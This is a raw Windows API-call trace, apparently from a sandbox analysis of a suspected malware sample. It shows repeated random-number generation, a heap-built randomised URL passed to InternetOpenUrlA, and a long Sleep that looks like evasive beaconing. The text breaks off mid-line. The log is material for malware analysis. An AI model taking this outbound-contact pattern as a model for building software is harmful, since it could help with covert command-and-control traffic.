[0276.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.851] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.851] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.851] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.851] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.853] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.853] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.853] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.854] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.854] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.854] GetProcessHeap () returned 0x440000 [0276.854] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0276.854] lstrcpyA (in: lpString1=0x473140, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0276.854] lstrcatA (in: lpString1="\x04", lpString2="/vkju3r0yevxjlPHji6XKj8i/wdpt01nhomxcgmv0yogQhthfmnp81bgDpt6qejbbwv8re5w9/U2vS1rexbly02xKj4rCeCke3otv6ni5jtsMvPtpe9wMlc9G/kog7lcq14nlvu8m7yqbl0dwd8pgg7zkesij8bmbYhXfwhvsh/" | out: lpString1="\x04/vkju3r0yevxjlPHji6XKj8i/wdpt01nhomxcgmv0yogQhthfmnp81bgDpt6qejbbwv8re5w9/U2vS1rexbly02xKj4rCeCke3otv6ni5jtsMvPtpe9wMlc9G/kog7lcq14nlvu8m7yqbl0dwd8pgg7zkesij8bmbYhXfwhvsh/") returned="\x04/vkju3r0yevxjlPHji6XKj8i/wdpt01nhomxcgmv0yogQhthfmnp81bgDpt6qejbbwv8re5w9/U2vS1rexbly02xKj4rCeCke3otv6ni5jtsMvPtpe9wMlc9G/kog7lcq14nlvu8m7yqbl0dwd8pgg7zkesij8bmbYhXfwhvsh/" [0276.854] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0276.854] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/vkju3r0yevxjlPHji6XKj8i/wdpt01nhomxcgmv0yogQhthfmnp81bgDpt6qejbbwv8re5w9/U2vS1rexbly02xKj4rCeCke3otv6ni5jtsMvPtpe9wMlc9G/kog7lcq14nlvu8m7yqbl0dwd8pgg7zkesij8bmbYhXfwhvsh/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0276.854] GetProcessHeap () returned 0x440000 [0276.854] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0276.854] GetProcessHeap () returned 0x440000 [0276.854] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d4900 | out: hHeap=0x440000) returned 1 [0276.855] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0276.855] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0276.855] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.855] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0276.856] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0276.856] Sleep (dwMilliseconds=0x18d84) [0276.979] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0276.979] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0276.979] GetProcessHeap () returned 0x440000 [0276.979] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a01850 [0276.979] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.980] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0276.980] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.980] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01851, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x3a01851) returned 0x0 [0276.980] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.980] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.980] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.980] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.980] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.980] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.980] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.980] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.981] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.981] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.981] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.981] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.981] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.981] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.981] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.981] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.981] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.981] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.982] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.982] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.982] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.982] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.982] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.983] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.983] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.983] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.983] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.983] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.983] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.983] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.984] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.984] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.984] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0276.984] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01868, cbBuffer=0x12, dwFlags=0x2 | out: pbBuffer=0x3a01868) returned 0x0 [0276.985] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.985] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.985] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.985] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.985] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.985] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.986] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.986] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.986] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.986] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.987] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.987] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.987] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0276.987] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.987] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.988] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.988] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.988] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.988] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0276.988] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a0187a, cbBuffer=0x1f, dwFlags=0x2 | out: pbBuffer=0x3a0187a) returned 0x0 [0276.989] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.989] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.989] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.989] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.989] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.990] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.990] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.990] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.990] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.990] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.991] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.991] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.991] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.994] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.994] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.994] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.994] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.994] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.995] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.995] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.995] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.995] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.995] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.995] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.995] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.995] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.996] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.996] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.996] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.996] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.996] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.996] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.997] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.997] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.997] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.997] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.998] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0276.998] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01899, 